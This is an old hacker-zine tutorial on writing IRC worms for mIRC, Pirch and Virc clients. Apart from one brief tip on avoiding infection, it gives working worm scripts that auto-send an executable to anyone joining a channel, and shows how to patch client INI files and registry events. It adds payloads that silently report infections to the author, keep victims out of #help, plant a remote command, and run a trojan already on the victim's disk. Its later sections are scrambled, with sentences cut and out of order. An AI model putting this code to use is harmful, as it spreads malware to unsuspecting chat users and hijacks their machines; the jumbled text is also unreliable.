Infiltration of a Nation
| last article | table of contents | next article |
|---|
| last article | table of contents | next article |
|---|
Strange Article - IRC WORMS - Theorie and code by SnakeByte
In this little tutorial I want to tell you some things about IRC worms,
how to prevent infection and to write them.
To be able to chat in the Internet Relay Chat (IRC) you need a client.
This may be a Java Application on a web site or one of the more comfortable (and more
powerful ;) clients you can get everywhere on the net. These clients are little programs
(like mIRC,Virc,Pirch,Kvirc,..) which run on your PC and connects you to an IRC-Server
or a net of several servers like the undernet. These clients offer us the possibility to
change them and their behavior for our needs. The clients can configured and changed with
a script language. Nearly every pseudo-hacking group offers you his own script, which are
normally for mIRC. If you want to download a script you may have a look at www.mircx.com,
which is a huge collection of several types of scripts. Every of these scripts has its
advantages and disadvantages. There are for example entertainment scripts, which allow us
to play little games via IRC and war scripts, which make overtakes in channels easier.
Nearly all Clients offer us the ability to send files to other chatters with the help
of the dcc command. This gaves a clever person the idea to create the first IRC worm, which
was designed for mIRC. This first worm was called Script.ini, because it only traveled with
the help of this single file, which contains the scripts for an unconfigured mIRC.
Due to the fact, that the preinstalled download folder for dccgets was the same like the
folder which contained the script.ini the old script.ini gots overwritten, if someone
accepted the dcc. When the new (wormy) script.ini gots loaded, you also started to dcc send
the infected script.ini to everyone who joined a channel, where you talked.
The next worm, which got widely known was DM-Setup and his variants. This time it was no
.INI file which traveled, it was an EXE-file which changed the INI file after execution.
This worm was also designed for mIRC, because this is the most widely spread client.
The most of the worms wait for the ON JOIN event to spred. So be aware if someone unknown
tries to dcc send you a file shortly after joining a new channel. Either you don't accept
the file or scan it with an up-to-date virus scanner.
For you as IRC worm writer this mean to start searching for other events to spread your
worm or use the .timer command to send the file after a short delay. Other possible events
are : dccsend, notify, query, text...
Let's start with the interesting part:
How to code an IRC-Worm ?
It does not matter which language you choose to write the worm, all you have to take care
of are the several clients, because the all differ a bit in they way you can infect them.
But I don't care if you write in VB, ASM, TP or Wordmacro ;) .. (but I prefer asm ;)
I don't want to write a tutor about all those different programming languages, I only want
to explain how to infect the different scripts. I think you will be easily able to do the
other part with some programming experience with the language of your choice. But keep
the file short (not as I did with NBC :P ) it shouldn't be greater than 40-50kb, because
this makes the dcc take longer which makes the infected user more suspicious...
1.) mIRC - The most used Client, which also has the most scripts..
Generally mIRC gets installed to 'c:\mirc\' or 'c:\MIRC32\'. This is the place where you
find your victim. There are two possibilities to infect mIRC. Either you overwrite
the 'script.ini' or another script file, or you patch the 'mirc.ini' and create a new
file with your worm script. The first possibility is much easier, but it fails, if a more
complex script is installed which does not use the script.ini. I prefer the second way which
has the better choice of spreading. Thats why I will explain the second way now.
You have to patch the file 'mirc.ini' at the section '[rfiles]' (why don't you have a look
at this file with your notepad ? ;). There you have to add a new ini file or overwrite one
of the existing. But note that the first two entries will not be used ( n1= and n2= )
So change 'n3=OLDSCRIPT.ini' to 'n3=WORMSCRIPT.ini'. After this you have to create this
new ini file. It has to start with '[Script]' (without the '' .. :P )
and after this it has to contain the infectious script.. ok here is an example:
[Script]
n0=on 1:join:#: { if ( $nick == $me ) halt
n1= else /dcc send $nick C:\MIRC\WORM.EXE }
n2=on 1:TEXT:leave!!!:#:{ /msg $chan Your will is my command
n3= /part $chan }
This script file has 4 lines, which I want to explain..
line n0= : If someone joins a channel you are in, then it checks if you are the one
who joines the chan (you don't want to send the worm to yourself ;)
If you are the one it stops.
line n1= : If not, it starts dcc sending the 'C:\MIRC\WORM.EXE'-worm to $nick, which
is the one who joined the channel.. This is all you need for spreading..
line n2= : But we do not only want to spread.., :) heh virii-writers are evil :P (but not
destructive ..), we also want to open a little .. hmm lets say backdoor..
If someone says the text 'leave!!!' to the channel, you will answer with
'Your will is my command' and
line n3= : part the channel.. :) ..
If you need further instructions about mIRC and its scripting language, take a look
at the file 'mirc.hlp' which is offered with every mIRC client. But I will also speak about
some Candies later in this tutorial.. :)
2.) Pirch - Nice Client, which allows us to chat on several Servers at the same time
Pirch is normally installed to 'C:\Pirch98\'. There is also the file 'events.ini' stored,
which contains the script for Pirch. Pirch gets infected by replacing the original
'events.ini' with a virulent one. Simply overwrite it..
Let's have a look at an infected 'events.ini':
[Levels]
Enabled=1
Count=6
Level1=000-Unknowns
000-UnknownsEnabled=1
Level2=100-Level 100
100-Level 100Enabled=1
Level3=200-Level 200
200-Level 200Enabled=1
Level4=300-Level 300
300-Level 300Enabled=1
Level5=400-Level 400
400-Level 400Enabled=1
Level6=500-Level 500
500-Level 500Enabled=1
[000-Unknowns]
User1=*!*@*
UserCount=1
Event1=ON JOIN:#:/dcc send $nick c:\Pirch98\worm.exe
EventCount=1
[100-Level 100]
UserCount=0
EventCount=0
[200-Level 200]
UserCount=0
EventCount=0
[300-Level 300]
UserCount=0
EventCount=0
[400-Level 400]
UserCount=0
EventCount=0
[500-Level 500]
UserCount=0
EventCount=0
This file is partet into several sections, the first contains general options, which you
can easily figure out on your own .. :P .. If you can't stop reading this tutorial..
The first section [000-Unkowns] contains the hostmask User1=*!*@*,
and all users are in this hostmask, because it contains only wildcards.. :)
UserCount shows us the number of hostmaks in this area .. 1 the wildcardmask.
It would be stupid to add other users here, but it would be a nice side effekt to
add your mask to level 500 and send you a msg when you join a channel .. :)
But let's go back to our worm .. after the UserCount we set the event for all the useres
with that 'specific' hostmask a dcc send, what else? Now we have to set the variable
EventCount .. This is 1 again .. There is only this single event needed to spread (as is told
you before it is better to use another event..)
You want to know more about Pirch scripting? Come on, take a look at 'Pil.hlp' in your
Pirch folder :)
3.) Virc - My favourite, but the author stopped support :(
The normal installation folder is 'C:\Virc\' and when the programm gets started the first
4.) mIRC Xtrad - Sure Worms shall also make fun I will tell you here some things about nice add-ons for your worm, which you surely find
The ON TEXT event is great for let an infected user look stupid in the channel ;)
on 1:text:#:*idiot*:/say $chan I am stupid!!!
What does this do? .. Someone says 'hello idiot' or another phrase that contains the
Here comes a nice technique DMsetup used to keep the victims away of channels with
on 1:Join:#:if $chan = #help /part $chan
If the victim joins the #help channel it parts it instandly again .. ;)
You want to know who is infected with your worm? .. Thats easy:
on 1:connect:.msg MaStEr I am infected...
When the victim connects to a server it sends the one with the nick MaStEr a short message
Ok you want to inform the infected about the worm? Or scare him, that he belives he is
/titlebar *#*#*#*#*#*( You are lame )*#*#*#*#*#*#*
Thats all you need .. :)
Ok .. as i mentioned before there is a helpful command called timer:
/timer1 60 /kick $me
This sets a 60 seconds timer .. After the timer runs out the user kicks itself .. :)
on 1:OP:#:.timer1 60 /kick $me IDIOT!!
Hehe .. The victim kicks hisself 60 seconds after getting ops .. :)
Another interesting command is 'run'. With /run I hope you like this little tutorial and understand now how IRC worms work.
time the script gets loaded (default.lib) and is saved in the windows registry.
If you have the possibility to change the default.lib before it is loaded do so!
But normally, the victim has started Virc at least once when it recieves the worm and
executes it.
Seems as if we have to work in the registry .. Ok why not.
Start 'regedit' and have a look at it .. What do we find .. At
'Hkey_Users\.Default\Software\MeGALiTH Software\Visual IRC 96\Events\Event17'
is our good old join event ..
(No I will not list all events with their key here :P )
Every Event is listened at this key .. There is an entry NAME at every EventXX
where the original name of the event is saved.
Ok, what will we have to patch now? Hmm .. VPL looks as if it contains script .. Right,
we found our script. Just write here the entrie 'dcc send $nick C:\VIRC\WORM.EXE'
Thats all you need for simple spreading with VIRC..
Here you also get some information about Virc scripting delivered with the client.
In the file 'vscript.txt' can curious coders find a lot of interesting things.
interesting. I don't think that it will be too hard to change them a bit for the other
clients, but I will show them only for mIRC .. Heh, I also have to do some other things
except tutorial writing ... :)
word idiot .. Just guess what the infected person answers .. :P
users that could help them..
Heh whats that little . ? I thought it has to be a / ? .. No it has not .. The point executes
the command secretly and the user is not noticed about it..
'hacked' ok .. Change the titlebar on an event you like .. AOL users are scared by this :)
Try this with
on the users HD. Try it with netscape to send him to a site you like .. Or if you know he
has a trojan on his disk, run it!
( /run Netscape www.Kefrens.de )
If you have some replys, comments or criticism (I am thankful for every mail)
then send it to SnakeByte@KryptoCrew.de
Cu soon SnakeByte